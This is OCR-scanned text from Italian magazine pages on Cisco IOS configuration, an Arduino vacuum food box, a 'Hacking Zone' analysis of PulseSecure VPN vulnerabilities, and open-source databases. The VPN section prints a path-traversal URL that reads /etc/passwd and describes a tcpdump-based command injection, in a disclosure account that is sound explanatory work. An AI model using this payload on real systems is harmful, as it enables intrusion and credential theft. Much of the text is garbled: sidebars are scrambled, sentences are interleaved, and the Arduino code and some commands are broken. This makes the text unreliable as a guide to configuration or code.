sulla memoria interna del dispositivo. 
Comunque ci si connetta all’OutOfBand, 
è possibile vedere tutto il processo di boot 
del dispositivo e persino entrare nelle 
impostazioni del BIOS. Naturalmente, 
serve un monitor seriale: Putty è una buona 
soluzione, ma si può usare un qualsiasi 


programma di questo tipo. Uno dei più 
comuni, privo di interfaccia grafica, è 
screen. Possiamo installare screen su un 
sistema Ubuntu con il comando 


sudo apt-get install screen 


Naturalmente, dopo aver collegato il cavo 
seriale al proprio computer è importante 
scoprire il nome della porta seriale. Il modo 
più semplice consiste nel controllare i 
messaggi del sistema alla ricerca di una tty: 
Di solito si tratta di ttyUSB0 o ttyACMO, 
o ancora ttyS0. Il nome dipende dal tipo 
di implementazione USB (hardware o 


software). 
screen /dev/ttyUSB0 9600 


Il baud rate è solitamente 9600, a meno che 
non sia stato impostato diversamente. Per 
conoscere tutti i comandi di screen basta 
premere Ctrl+A seguito da ?. 


LE MODALITÀ DI IOS 


Connessi alla console del router, e acceso il 
dispositivo, si vedrà apparire sul terminale la 
serie di messaggi di avvio. In particolare, si 
vedrà il BIOS che si occupa di decomprimere 
l’immagine del sistema operativo IOS, di 
cui sono dotati tutti i dispositivi Cisco. 
All’avvio del sistema vengono presentate 
alcune informazioni sulla 
del sistema operativo e  sull’hardware 
disponibile. Alla fine, il sistema arriva alla 
Configuration Dialog. Il sistema chiede se 
si voglia procedere con questo wizard per la 
configurazione: 


versione 


Continue with configuration dialog? 
(yes/no) 


000% 
sese 
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RM Fig. 3 © Un tipico router, con le porte per l’accesso alla console 


Se si risponde No il sistema ci offre il 
terminale, e ci troviamo automaticamente 
nella modalità User Exec. IOS prevede 
almeno 7 diverse modalità: 

User EXEC Mode 

Privileged EXEC Mode 

Global Configuration Mode 

Interface Configuration Mode 

Sub Interface Configuration Mode 

Setup Mode 

ROM Monitor Mode (ROMMON) 


In ogni caso, per conoscere i vari comandi 
disponibili basta dare il comando ?. 

La User EXEC mode si riconosce perché il 
prompt è rappresentato dal simbolo >, per 
esempio 


Router> 


e possiamo controllare anche di essere in 
questa modalità dando il comando 


show privilege 


che restituisce il valore 1 per la User EXEC 
Mode. Questa modalità non offre grandi 
possibilità, perché è quella di base. Per 
passare alla modalità da amministratore, 
la Privileged EXEC Mode, basta dare il 
comando 


enable 

La modalità “privilegiata” è solitamente 
protetta da password (nei laboratori spesso 
non lo è, ma nei contesti reali dovrebbe 
esserlo). Entrati in questa modalità, il 
prompt cambia in 


Router# 


Così sappiamo di avere i privilegi per fare 
modifiche alla configurazione. Questa 
modalità ha come numero di privilegio 
(comando show privilege) 16, che è il 
numero massimo. 

Con il punto di domanda possiamo vedere 
che la lista dei comandi disponibili è 


molto più lunga di quella della prima 
modalità. 

La modalità successiva è quella dedicata 
alla configurazione globale: si possono 
fare modifiche generiche, come cambiare 
l’hostname del dispositivo col comando 


hostname nuovonome 


Dalla modalità di configurazione globale si 
può procedere a configurare una specifica 
interfaccia, per esempio l’ethernet, col 
comando 


interface gigabitEthernet 0/0 


Qui si possono configurare i dettagli relativi 
a questa interfaccia senza che si ripercuotano 
sulle altre, per esempio l’IP con i comandi 
ip e ipv6 ma anche le linee di accesso con il 
comando line. 

Se il dispositivo supporta la virtualizzazione 
delle interfacce, è possibile usare la modalità 
SubInterface con questo tipo di comando 


SCRIVERE PIÙ VELOCEMENTE | 


I0S i una Lai in 
teressante: non è necessario 


caltà non è nemmeno. neces- 


e Î sistema le riconoscerà per- _ 


do un nome di deminie: e inizierà 


sario completare il comando 
digitare i comandi per intero. perché venga eseguito, basta 


Ovviamente, 


to. Per esempio, i il comando 


nali GNU/L rux. Cioè, se il 
comando che vogliamo scri- | 
vere è configure basta scri- 
vere conf e premere il tasto — 
TAB per ottenere il comple- 
tamento dell “comando sul 
n solo: in re- 


può anche essere scritto come 


funziona la tab indicare i caratteri minimi. 


fettamente. Allo stesso modo, 


‘enable può essere scritto an- 
che solo come en. Non si può 
scrivere solo e perché sarebbe — 

‘ambiguo, visto c 

ii; _ enableche exit. 

SE un comando inesistente, maga- 

ri perché abbiamo sbagliato a 

| digitare, il sistema per opzione . 
| predefinita penserà che si tratti 


C'è solo un problema: se diamo 


‘esistono sia 


il Lookup perché cercare di risol- 
“verlo in un indirizzo IP. Il proble- 
‘ma è che questa cosa fa perdere 
un sacco di tempo. Per evitarlo 
basta disabilitare la risoluzione 
automatica dei nomi di dominio: 


il comando deve essere lanciato 
dalla modalità Global Configure. 


interface gigabitEthernet 0/0.1 


Perspecificare il numero della sottointerfaccia 
che vogliamo configurare. 

Chiaramente, per tornare “indietro” alla 
modalità precedente basta dare il comando 
exit. Se ci si trova nella modalità di Global 
Configuration è possibile gestire, tra le altre 
cose, le opzioni di routing con il comando 
router seguito dal protocollo che si vuole 
usare, per esempio 


router ospf 


Esistono poi le modalità di Setup 
e di ROMMON. La prima, viene 
attivata automaticamente all’avvio del 
dispositivo se non viene trovato un file di 
configurazione valido e se si risponde Yes 
alla domanda che abbiamo già menzionato 
riguardo la Configuration Dialog. La 
modalità "ROMMON lanciata 
automaticamente se il BIOS non riesce a 
caricare l’immagine del sistema operativo. 
Si può anche entrare manualmente in questa 
modalità interrompendo la procedura di 
boot (basta premere Ctrl+C nei primi 60 
secondi del boot). 


viene 


LO SWITCHING 


La prima cosa che si nota con gli switch 
è che vengono solitamente denominati in 
base al numero di porte che offrono. Per 
esempio, il Cisco SG200-50 si chiama 
così perché ha un totale di 50 porte. Di 
queste, in realtà “solo” 48 sono destinate 
ai vari client da collegare alla rete, 2 
sono riservate alle combo GBIC, che 
permettono il collegamento anche di cavi a 
fibra ottica. Ma questo vale per il modello 
in questione, su altri modelli queste porte 
possono anche non essere disponibili. Sono 
invece sempre presenti le classiche porte 


per l’accesso alla Console, come abbiamo 
già visto per i router. Ottenuto l’accesso al 
sistema IOS per lo switch, bisogna iniziare 
a configurarlo, seguendo i comandi e le 
modalità che abbiamo già visto. 

Un esempio vale più di tante considerazioni 
teoriche, e per fare pratica, ci baseremo 
sul simulatore ufficiale di Cisco, Packet 
Tracer. Per ottenerlo, bisogna visitare il 
sito https://www.neta cad.com/courses/ 
packet-tracer e cliccare su Enroll, poi su 
Sign up today. Dopo avere fornito i dati 
richiesti riceveremo una email di conferma: 
cliccando sul link si fa il login col proprio 
account Cisco, si aggungono dei dati 
anagrafici, e si può procedere a scaricare 
Packet Tracer dal linkin fondo alla pagina (o 
direttamente da https://www.netacad.com/ 
portal/resources/packet-tracer). Packet 
Tracer verrà probabilmente installato nel 
percorso /opt/pt/packettracer, e al primo 
avvio richiederà il login con le credenziali 
di Cisco.com. 

Per provare la console di uno switch basta 
selezionarne uno (come il modello 2960) 
dalla libreria dei dispositivi e trascinarlo 
nel piano di lavoro. Con un click sul 
dispositivo lo si può configurare, ma si può 
anche accedere alla sua console (CLI), 
simulata come se si fosse collegati a un 
vero switch usando il cavo per la console. 
Come abbiamo già detto, l’accesso inizia 
nella modalità utente non privilegiato. Per 
diventare “amministratore” dobbiamo dare 
il comando 


enable 


Da qui possiamo procedere impostando 
quello che vogliamo. Per esempio, iniziamo 
a cambiare l’hostname del dispositivo. Si 
tratta di una impostazione globale, quindi 
entriamo nella modalità di configurazione 
globale col comando 


BI Fig. 4 * Gli switch non hanno un pulsante di accensione 


configure terminal 


Il prompt ci avvisa di inserire i comandi 
uno per riga. Per cambiare l’hostname basta 
dare il comando omonimo seguito dal nuovo 
hostname 


hostname ilmioswitch 


Per modificare il banner si fa una cosa diversa: 
il comando prevede l’uso di un carattere 
speciale che dovrà segnalare l’inizio e la fine 
del massaggio, che può essere su più righe. Il 
comando da usare è banner motd, seguito dal 
carattere in questione: solitamente si sceglie 
la e commerciale, perché è un carattere che 
non si usare normalmente nel testo, ma potete 
scegliere quello che volete. Si può quindi 
scrivere una cosa di questo tipo: 


banner motd & 
KKAKKKKKKAKKAKAKAKKKAKKAKKKKAKKKAKKKKK 
Switch nel laboratorio del 
primo piano. i 
KKKKKXKKKAKAKKKKKAKKAKKKFKKKAKKKKKKKKA 


& 


Da notare che motd sta per Message Of 
The Day, e per il testo si possono usare solo 
caratteri standard ASCII (quindi non le lettere 
accentate). 

Un’altra cosa da modificare subito è la 
password di login, per impedire l’accesso a chi 
non è autorizzato. Prima di tutto, controlliamo 
quale sia l’attuale configurazione con il 
comando 


do show run 


Il “do” serve perché il comando show run 
appartiene alla modalità Priviledge exec 
mode, quindi per eseguirlo dalla modalità 
Global Configuration dobbiamo anteporre 
la parola chiave do. Se è la prima volta che 
configuriamo lo switch sarà probabilmente 
vuota. Per 
dell’accesso alla console diamo il comando: 


eseguire la configurazione 


line console 0 


Abbiamo una sola console, quindi il suo 
numero è zero. Nel caso vi siano più console, 
basta indicare man mano i vari numeri (da 0 in 
poi). La password può essere modificata con 
il comando 


password lanuovapassword 


sese 
896 
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e abilitata digitando il comando 
login 


Il primo comando infatti si limita a impostare 
la password, ma non la rende obbligatoria. 
Con secondo comando diventa obbligatorio 
digitare la password per accedere alla 
console. Usciamo dalla configurazione della 
linea con 


exit 


Ora le altre password da impostare sono 
quella di telnet e quella per il comando 
enable. Per impostare la password di telnet 
bisogna indicare le console virtuali su cui 
impostare la password: di solito ce ne sono 
16, quindi da 0 a 15: 


Ta sanre ‘comando cy 
da Giobal Confiy 
Fig. 5 e | comandi base di I10S 


do comando 


line vty 0 15 


Poi la password può essere impostata 
sempre con i comandi password e login. 
Per impostare la password di enable basta 
dare questo comando: 


MUSSHE 


Global config 


enable password lanuovapassword 


La password di enable è utile per 
permettere a alcune persone l’accesso alla 
modalità senza privilegi, senza che però 
possano anche lanciare comandi pericolosi. 


Ì QUIZ PRESENTI IN QUESTE PAGINA SONO ISPIRATI / ALLE REALI 
DOMANDE CHE SI POSSonO TROVARE NELL LESAIIE SOLO 200-125 
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AZIONE 


Hostname 
ogon banner 
Imi 2 il miti 


Enable ni crittografata 
Eseguire comando Priviledge 
da Global Config 


Fig. 6 e Le modalità di Cisco I0S 


| do comando 


Il problema è che questa password è 
memorizzata in chiaro nella configurazione 
ed è quindi accessibile direttamente dalla 
RAM del dispositivo. Per essere più sicuri 
bisogna impostare una password “secret”, 
con questo comando: 


hostname iinuovonome 
banner motd & il mio testo & 
show running-config 


enable secret opera Avec 


COMANDO MODALITA' 


Giobal Config 
Global Config 
Priviledge Exec 


‘Global config 
| Global config 


enable secret passwordsicura | 

Dal momento che il secret è impostato, 
sarà questa password a essere richiesta per 
utilizzare il comando enable e entrare nella 
modalità Priviledge Exec. Va detto che non 


è comunque un gran sicurezza, la password 
è crittografata in modo molto debole, ma è 
comunque meglio di niente. 

Le altre password, quelle per l’accesso alla 
console fisica e a telnet, possono essere 
crittografate col comando 


Rimane il fatto che il terminale di un 
dispositivo di rete non dovrebbe essere 
facilmente esposto, quindi conviene 
non abilitare l’accesso telnet se non è 
strettamente necessario, mantenendo solo la 
console con accesso fisico. Naturalmente, 
bisogna valutare la situazione in cui ci si 
trova a lavorare, vi sono ambienti nei quali 
si può privilegiare la semplicità rispetto 
alla protezione. 
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CONSERVARE 


GIBO SOTTOVUOTO 


Con Arduino possiamo realizzare una grande scatola per conservare il cibo 
sottovuoto, invece di ricorrere ai classici e scomodi sacchetti: una soluzione 


ecologia, comoda, e facile e divertente da assemblare 


n metodo di conservazione del cibo 

sempre più diffuso è il sottovuoto. Si 

tratta di un metodo abbastanza mo- 
derno, fino a qualche decennio fa non era così 
semplice acquistare una pompa per indurre il 
vuoto. Il vantaggio fondamentale di questo si- 
stema è che permette di mantenere intatte le ca- 
ratteristiche di un cibo: non serve disidratarlo 
o speziarlo. Ed è anche molto rapido: diversa- 
mente dal congelamento non c’è alcun bisogno 
di aspettare ore per congelare e scongelare. 
Naturalmente, la maggioranza delle persone è 
familiare con l’uso di sacchetti per il sottovuo- 
to, anche se non sono sempre comodi: molte 
cose non possono essere facilmente messe in 
un sacchetto sottovuoto, come i liquidi e le ge- 
latine. Inoltre, c’è il problema che se si apre 
un sacchetto consumando solo una parte di ciò 


Recuperare la pompa da vuoto 


che vi era contenuto poi bisogna richiudere il 
sacchetto, e non è sempre possibile. La realtà è 
che per molte cose non avrebbe senso usare dei 
sacchetti: sarebbe molto meglio usare una sca- 
tola che si mantiene sottovuoto in modo auto- 
matico, un po’ come un frigorifero si mantiene 
alla giusta temperatura. In commercio esistono 
dei contenitori che possono essere utilizzati as- 
sieme alle classiche pompe da sottovuoto com- 
merciali, ma sono solitamente molto piccoli 
e comunque richiedono una attività manuale. 
Sono quindi molto inefficienti, fanno perdere 
tempo e non permettono nemmeno di conser- 
vare molto cibo. Per esempio, se cuciniamo un 
chilo di biscotti e vogliamo conservarli senza 
che l’aria e l’umidità possano danneggiarli per 
almeno una settimana o più sarebbe scomodo 
dover usare tanti diversi sacchetti o scatolette. 


La soluzione consiste nel costruire noi stes- 
si una scatola sottovuoto, grazie a Arduino e 
una pompa da vuoto (e una scatola ermetica 
di grandi dimensioni). Ormai è infatti possibile 
acquistare delle pompe da vuoto a batteria, se 
ne trovano per una dozzina di euro, di solito 
hanno una classica forma cilindrica. Hanno 
un loro circuito di controllo, ma noi possiamo 
smontarle e controllare il motore direttamen- 
te con Arduino. Queste piccole pompe non 
sono altro che delle membrane di plastica e 
gomma fatte oscillare da un motore a corrente 
continua, che di solito funziona su un range di 
3-9Volt. 

Avremo poi anche bisogno di una valvola a 
solenoide per gas: questa ci permetterà di sigil- 
lare il foro che faremo nella scatola quando la 
pompa non è in funzione, e permettere invece 


Smontiamo la pompa commerciale per recuperare le parti fondamentali 


SENZA COPERCHIO 

01 La prima cosa da fare è procurarsi la pompa da 
vuoto e smontarla: solitamente si tratta di un sem- 

plice sistema a incastro, basta fare leva con un cacciavite e 
separare il coperchio. 


esse 
ceo 
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VIA IL CIRCUITO 


02 Le pompe da vuoto hanno un circuito che regola l’ac- 
censione del motore: rimuovendo le viti che lo ten- 
gono fissato alla plastica si possono vedere facilmente i cavi di 


alimentazione. Ci interessano quello che sono diretti al motore. 


Facciamo passare l’aria e i dati 


Trapaniamo dei fori nella scatola per far passare il tubo dell’aria e il sensore 


LA POLARITÀ 


PICCOLI FORI 


Dopo avere recuperato la scatola che si vuole usa- 

re per conservare il cibo, bisogna praticare due fori 
quanto più piccoli possibile. In uno deve passare un tubo di 
gomma, nell'altro quattro connettori dupont. 


Bisogna capire quale sia il polo positivo e quale quel- 
lo negativo connessi al motore, altrimenti la pompa 
non girerà nel verso giusto. Basta usare un tester e vedere in 
quale caso il voltaggio risulta positivo, con la pompa accesa 


CON I CAVETTI 


Scoperta la polarità dei cavi, possiamo tagliare i fili e 

collegarli a dei connettori dupont. Di solito sono cavi di 
rame semplici, non serve saldarli. Per non fare confusione, con- 
viene etichettare il polo positivo. 


DITEMI 


TUBI IN GOMMA 
04 Un altro tubo deve essere preparato per l'ugello del- 
la pompa: entrambi i tubi in gomma devono avere lo 
spessore per essere inseriti nella valvola senza bisogno di altri 
raccordi. La lunghezza dovrebbe essere da 3 ai 6 cm. 


il passaggio dell’aria quando dobbiamo aspi- 
rarla con la pompa oppure semplicemente per 
permettere lo sfiato e riportare la pressione 
alla normalità quando si vuole aprire la sca- 
tola. Un semplice interruttore ci permetterà di 
indicare a Arduino se vogliamo che la scato- 
la venga tenuta sottovuoto oppure se debba 
essere riempita d’aria per poter essere aperta 
facilmente. Per tenere la scatola sottovuoto 
utilizzeremo un semplice sensore di pressio- 
ne, il BMP180. 

Con questo sensore misureremo la pressione, 
assicurandoci che rimanga sempre sotto il li- 


vello stabilito. Il livello da indicare è in realtà 
abbastanza arbitrario: possiamo fissarlo a un 
valore prestabilito (per esempio 960 hPa), 
oppure calcolare automaticamente questo va- 
lore in modo che sia almeno 80-90 hPa sotto 
la pressione atmosferica misurata quando la 
scatola è aperta. Se fissiamo un valore stan- 
dard ricordiamoci che la pressione atmosferi- 
ca cambia anche molto a seconda dell’altitu- 
dine a cui ci si trova. Per fare un esempio, chi 
abita sul livello del mare, e ha una pressione 
media di 1010 hPa, può fissare un valore di 
960 hPa per considerare di avere raggiunto un 


sottovuoto accettabile. 

In linea di massima basta provare la pompa 
e vedere a quale pressione la scatola tende a 
deformarsi. Per attivare il motore della pom- 
pa e il solenoide della valvola utilizzeremo 
dei relay, perché non possiamo alimentar- 
li con i semplici SV di Arduino ma devono 
essere direttamente connessi alla nostra sor- 
gente di alimentazione da 9V. Una alterna- 
tiva per alimentare il motore da Arduino è 
usare un apposito transistor (http://bit.ly/ 
henrysbencharduino), ma i relay sono molto 
comodi da utilizzare. 


sesa 
eos 
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IL CODICE PER ARDUINO #include <Adafruit BMP085.h> mente per i dati e il clock. 


Il codice per far funzione questo pressostato è Adafruit BMP085 bmp; 


molto semplice, e lo si può trovare all’indirizzo 


int pushButton = 8; 


http://bit.ly/codicearduinolm195. Si inizia in- Ora potremo accedere al sensore mediante int valve = 7; 
cludendo la libreria BMP0O85 di Adafruit, che l’oggetto bmp. Ricordiamo che, come a ma- int pump = 6; 
serve per il sensore di pressione. nuale, il sensore va connesso al pin GND di 


Arduino, all’alimentazione 3.3V (non ai clas- 


Stabiliamo i pin utilizzati per il pulsante, e i 


#include <Wire.h> sici SV) e poi ai pin analogici 4 e 5 rispettiva- relay che attivano la valvola e la pompa. 


Sigilliamo con la resina epossidica 


Usando silicone e resina possiamo sigillare i tubi per evitare perdite d’aria 


è n | li -- ql 


SIGILLIAMOLI 

| fori fatti sulla scatola devono essere si- 

gillati: va bene una resina epossidica (colla 
bicomponente). Anche il tubo connesso alla pompa 
deve essere fissato: del silicone trasparente è più che 
sufficiente. 


SENSORE BMP 

Il sensore di pressione BMP180 deve essere 

collegato, tramite i cavi che abbiamo fissato, 
all'interno della scatola, che a questo punto è pronta 
per essere chiusa. L'altro capo dei cavi va ovviamente 
connesso a Arduino. 
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VALVOLA DA GAS 

La valvola va interposta tra i due tubi: questo col- 

legamento è importante, perché la pompa da sola 
non tiene il vuoto se è spenta. La valvola, che dovrebbe es- 
sere normalmente chiusa, sarà la garanzia che l'aria non 
possa passare facilmente. 


CON DUE RELAY 
0 b | collegamenti elettrici sono semplici: sia la valvola 
che la pompa hanno bisogno di essere attivate tra- 
mite un relay usando i 9V dell’alimentatore invece dei 5V di 
Arduino. Serve poi un interruttore o un pulsante per stabilire 
se indurre il vuoto o no. 


double vacuum 960.0; 
double safety = 20.0; 


Nella variabile vacuum indichiamo la pres- 
sione da raggiungere per avere il “vuoto”. La 
variabile safety indica il range di sicurezza: 
vuol dire che, se 960 è la pressione da rag- 
giungere, la pompa verrà spenta solo quan- 
do si sarà arrivati a 940. Questo perché una 
minima perdita d’aria è sempre possibile, e 
pian piano la scatola non sarà più sottovuoto. 
La pompa verrà però riaccesa solo quando la 
pressione sale sopra i 960 hPa. 


void setup() { 

pinMode (pushButton, INPUT); 

pinMode (valve, OUTPUT); 

pinMode (pump, OUTPUT); 

Serial.begin(9600); 

if (!bmp.begin()) { 
Serial.printlin("Could not 
find a valid BMP085 sensor, 

check wiring!"); 

while (1) {} 


Nella funzione di setup non si fa altro che sta- 
bilire la funzione dei pin e iniziare la comuni- 
cazione col sensore. 


void loop() { 
double pressure = (bmp. 
readPressure()/100); //hPa 
Serial.print("Pressure = "); 


Serial.print (pressure); 


Serial.println(" Pa"); 


A ogni ciclo della funzione loop, leggiamo 
la pressione e la scriviamo sulla porta seriale 
per debug. 


if (digitalRead(pushButton) == 
HIGH) { 
digitalWrite(valve, HIGH); 
digitalWrite (pump, HIGH); 


Se l’interruttore è attivato, apriamo la valvola 
e accendiamo la pompa, per cominciare a fare 
il vuoto. 


while (pressure > vacuum && 
digitalRead(pushButton) == HIGH) 
{ 
pressure = (bmp. 
readPressure ()/100)+safety; 
Serial.print("Pressure = 


uao presa sanno sone 
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® Fig. 2 è I vari collegamenti necessari per il progetto 


9: 
Serial.print (pressure); 
Serial.println(" Pa"); 
delay (1000); 


Continuiamo a leggere la pressione finché il 
valore è superiore a quello stabilito per avere 
il vuoto (e l’interruttore è ancora attivo). 


Serial.println("Stop"); 
digitalWrite(valve, LOW); 
digitalWrite (pump, LOW); 


Appena il valore desiderato della pressione è 
raggiunto, chiudiamo la valvola e spegniamo 
la pompa. 


} else { 
digitalWrite (pump, LOW); 
digitalWrite(valve, HIGH); 


Se invece l’interruttore viene portato su 
“off” spegniamo la pompa e apriamo la 
valvola per permettere una facile apertura 
della scatola. 


delay (5000); 


LA LISTA 


DELLA SPESA. 
‘Quanto ci è costato realizzare 
questa scatola sottovuoto? Questa 
è la lista dei pezzi necessari, coni. 
prezzi più bassi rilevati online: 
. * Arduino UNO: 2,7 euro 
_ * 2 Relay: 1,2 euro 

e Pompa da vuoto: 10 euro 
. * Elettrovalvola: 2 euro 

* Sensore BMP180: 3 euro 

e Scatola ermetica 10 Litri: 20 
| euro .. 

e Cavi di rame dupont: 2 euro 


Il totale ammonta a circa 41 euro, 
a cui va aggiunto il costo di una 
scatoletta in plastica (circa 4 euro) 
| per evitare di lasciare i contatti 
| esposti all'aria e un alimentatore 
| da 9Volt per Arduino (3 euro su Ali 
- Express 


Il ciclo viene ripetuto ogni 5 secondi, control- 
lando la pressione e eventualmente attivando 
la pompa se necessario per tenere sempre la 
scatola sotto vuoto. 


® 
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HACKING ZONE 


Su ogni numero 
trovi l’analisi 


dettagliata 

delle vulnerabilità 
più pericolose 

e le soluzioni 


più adatte 


| per risolvere 
|. il problema 


Quando la VPN è il punto debole 


Le reti VPN vengono utilizzate dai privati ma soprattutto dalle aziende per proteggere 
la connessione tra i client dei dipendenti e i propri server, ma una delle più famose 
conteneva un grave bug nell'implementazione dell'interfaccia Web 


successo presso il pubblico. In linea di massima si 

tratta di una cosa positiva: gli utenti sono più attenti 
alla propria privacy, segno che la copertura mediatica dei vari 
scandali di violazione della privacy (come il caso Snowden) 
è servita a trasmettere il messaggio. Naturalmente, alcune 
persone usano le VPN più che altro per accedere a server 
che sono bloccati in Italia, come quelli dei Torrent, ma hanno 
comunque bisogno della privacy. E infatti si preoccupano 
quando qualcosa va storto. Le VPN possono infatti essere 
una buona tecnologia, ma di fatto richiedono molta fiducia nei 
confronti del gestore della VPN. Basti pensare al data leak di 
NordVPN: nel 2018 un server è stato attaccato a causa di una 
cattiva configurazione. Il server in questione era affidato a una 
azienda (non gestito direttamente da NordVPN) e l’azienda ha 
assicurato che nessun dato degli utenti è stato trafugato, ma 
è ovvio che questo caso abbia dimostrato quanta fiducia sia 


J successo le VPN stanno riscuotendo un certo 


È orange@ubuntu: - [69x21] 
B#8(C) 5RII(E) 1928(V) REM BIO) REM) 


Ml Fig. 1 * Col giusto percorso si può leggere qualsiasi 
file sul server 
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riposta nelle mani di chi gestisce effettivamente i server. 

E solo perché stavolta non ci sono stati danni gravi non vuol 
dire che non possano essercene in futuro. Ad ogni modo, finché 
ad essere vulnerabili sono dei servizi destinati principalmente 
a utenti privati si può supporre che il danno sia tutto sommato 
contenuto: nella peggiore delle ipotesi si scoprirà quali film 
tenta di scaricare illegalmente un utente, è improbabile che 
vi siano conseguenze legali vere e proprie. Del tutto diverso è 
il discorso relativo alle VPN cui si appoggiano le aziende per 
proteggere i loro dati sensibili, che tipicamente possono essere 
ospitate sugli stessi server dell’azienda. In questi casi anche 
un piccolo leak può rivelarsi estremamente dannoso, perché le 
informazioni scambiate sulla rete possono avere grande valore. 
Oltre a ripercussioni legali se venissero esposti dati riservati dei 
clienti, in violazione a regolamenti come il GDPR. È per questo 
che ora parliamo del caso di PulseSecure VPN. 


INTERFACCIA CGI IN PERL 


PulseSecure offre diversi servizi, in particolare una VPN con 
SSL end-to-end per garantire che ogni dispositivo aziendale 
(soprattutto quelli mobili) sia sempre connesso tramite una 
rete non intercettabile. La configurazione dell’accesso alla rete 
viene fatta tramite una interfaccia CGI su un server web. Questa 
interfaccia è sostanzialmente un misto di C++ e Perl, che è 
strano ma comunque non così inusuale. Un gruppo taiwanese 
di esperti di sicurezza di è accorto che persino Google fa uso 
dei servizi di questa VPN, quindi ha deciso di iniziare a studiare 
la sicurezza dell’interfaccia. Ricordiamo infatti che l’interfaccia 


fo) 


è accessibile dai dispositivi, quindi un eventuale malware 
presente in locale su un dispositivo può contattare l’interfaccia 
tramite richieste HTTP e provare a crackarla. Gli esperti hanno 
trovato una serie di vulnerabilità, ben 7, le più importanti delle 
quali sono una aribitrary file read e una command injection. 
La lettura di un file arbitrario è pericolosa perché permette a un 
attaccante di ottenere informazioni sul sistema, inclusi gli hash 
delle password con cui fare il brute force. Questo è dovuto 
al fatto che nel server web implementato da PulseSecure la 
validazione del percorso del file richiesto non controlla davvero 
l’intero percorso ma solo la parte finale. Usando il punto di 
domanda è quindi possibile ingannare la funzione. Scrivendo 
un indirizzo del tipo: 
https://ssIvpn/dana-na/../dana/html5acc/guacamole/../../../,./.././etc/ 
passwd?/dana/html5acc/guacamole/ 

La funzione controllerà solo ciò che si trova dopo il simbolo 
2, che è ovviamente è un percorso valido. Invece, l’intera 
stringa verrà passata al filesystem il quale, dopo avere risolto 
il percorso con i vari doppi punti, restituirà il file /etc/passwd. 


L'EXPLOIT 


La command injection è dovuta a un errore nella scrittura della 
pagina di amministrazione, che sul server web viene richiamata 
con l’indirizzo /dana-admin/diag/diag.cgi: 


::param("options")); 


sub tcpdump options syntax ch 


my $options = shift; 


return. $options 


return un 


Questo script Perl legge le opzioni e le utilizza per lanciare un 
comando tcpdump da terminale. Modificando il valore della 
variabile options è quindi possibile eseguire un comando sul 
sistema. Non è così semplice: le opzioni vengono controllate 
per assicurarsi che non ci siano simboli strani, ma è possibile 
sfruttare una caratteristica di Tepdump: se gli si impone (opzione 
-r) di leggere un file inesistente risponde in questo modo: 


tcpdump -d -r 'print 123#' 


tcpdump: print 123#: 


No such file or directory 

Il fatto è che questa sintassi nel messaggio di errore è 
importante: il messaggio è in realtà una riga di codice Perl 
perfettamente valido. Ciò che si trova prima del simbolo : è 
considerata una etichetta per una eventuale istruzione GOTO. 
Quello che c’è dopo il simbolo # è un commento. Quindi basta 
aggiungere come opzione 


E si ottiene un valido codice Perl che può poi essere passato 


Welcome to the 
Twitter VPN Access Portal 


username 


password 


Realm TWO FACTOR FULL TUNNEL v 


Sign In 


BI Fig. 2 * Anche Twitter era vulnerabile all'esecuzione 
remota di codice 


direttamente all’interprete tramite una pipe. Si utilizza poi un 
operatore di trasferimento incompleto (il simbolo <) per dirigere 
l'output nel file desiderato invece che in /dev/null come 
sarebbe previsto. La stringa completa è 


n/tcpdump 


per eseguire il codice Perl scritto (e quindi il comando Is /). 
È già stato realizzato un exploit per Metasploit (https:/www. 
exploit-db.com/exploits/47700) che svolge tutte le operazioni au- 
tomaticamente. 


LA SOLUZIONE 


Il team taiwanese ha rivelato immediatamente le scoperte a 
PulseSecure. L'azienda ha collaborato da subito e in breve 
tempo ha modificato il proprio codice per evitare che si possa 
redirigere facilmente il flusso dell’output di tepdump scrivendo 
un codice Perl sul disco. Come dicevamo, questo tipo di 
servizio non colpisce gli utenti, ma le aziende che utilizzano 
PulseSecure per proteggere la comunicazione dei propri 
dipendenti. Abbiamo già citato Google, ma anche Twitter 
utilizzava PulseSecure VPN, e il team taiwanese è riuscito a 
dimostrare che tramite questa vulnerabilità i server di Twitter 
erano in pericolo: i pen tester sono riusciti a ottenere una lista 
di password in chiaro degli utenti che amministrano la rete di 
Twitter, quindi account con un notevole privilegio. Anche Twitter 
ha reagito immediatamente, eseguendo l’aggiornamento. 
Grazie alle immediate correzioni, sembra che nessuna 
infrastruttura di rete sia realmente stata messa in pericolo da 
accessi non autorizzati. 
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QUALE DATABASE SCEGLIERE? 


A volte è difficile scegliere tra le varie opzioni disponibili come database open source: 
presentiamo una semplice guida per capire quale soluzione sia migliore per ogni caso 


elle aziende è quasi scontato avere dei 
Ni per gestire i dati dei clienti 
o quelli dei fornitori, o altro ancora. 
Esistono molti tipi di database, e sicuramente 
in alcuni casi si usano ancora sistemi come dei 


file Access o persino dei fogli di calcolo che ven- 
gono fatti passare da un computer all’altro con 


pendrive o via email. Ma è un pessimo sistema 
di gestione dei database. In linea di massima 
conviene avere un server nella propria rete locale 
per l’accesso a un database relazionale, basato 
su delle query SQL. La domanda è: quale sce- 
gliere? Esistono vari tipi di sistemi di gestione 
database che si posso utilizzare, a seconda della 


propria situazione. I tre più famosi sono proba- 
bilmente SQLite, MySQL e PostgreSQL. Han- 
no caratteristiche differenti, ma sono comunque 
tutti open source e gratuiti, almeno nel funzio- 
namento di base. In molti casi sono disponibili 
delle estensioni a pagamento che aumentano le 
funzionalità del database. 


SQLITE 


SQLite è un database che si memorizza in un unico file: non ha bisogno 
di server e la libreria per il suo utilizzo è molto leggera, può essere im- 
plementata su qualsiasi sistema. A livello di accesso, quindi, funziona 
come un database Access: si ha un file che può essere copiato, inviato 
via email o messo su un server locale Samba per permetterne l’accesso 
da tutta la rete locale. Il vantaggio rispetto a Access è che usa un dialetto 
del SQL che lo rende compatibile, tramite appositi plugin, con molti 
software che hanno bisogno di database e non utilizzano i file MDB. Per 
esempio, anche Wordpress può essere configurato per usare un database 
SQLite, risparmiando il costo di un server per database. 


QUANDO USARLO 
* Applicazioni in locale 
* Si dispone di hosting con spazio su disco ma non di un server MySQL 


QUANDO NON USARLO 

* Si ha un database molto grande (1TB è il massimo consigliato) 
* Sono necessari molti accessi contemporanei in scrittura 

* È necessario l’accesso da remoto 


MYSOL 


MySQL è probabilmente il più famoso, anche chi non si intende di 
database l’ha sentito nominare. È finora il più diffuso numericamente, 
utilizzato anche da Twitter, Facebook e Netflix. È stato progettato per 
essere veloce, e tra i database open source è certamente il più rapido. 
Naturalmente un database come quello di Oracle è più performante, 
ma in realtà le caratteristiche di MySQL sono più che sufficienti per la 
maggioranza delle applicazioni. Bisogna dire, tuttavia, che per essere 
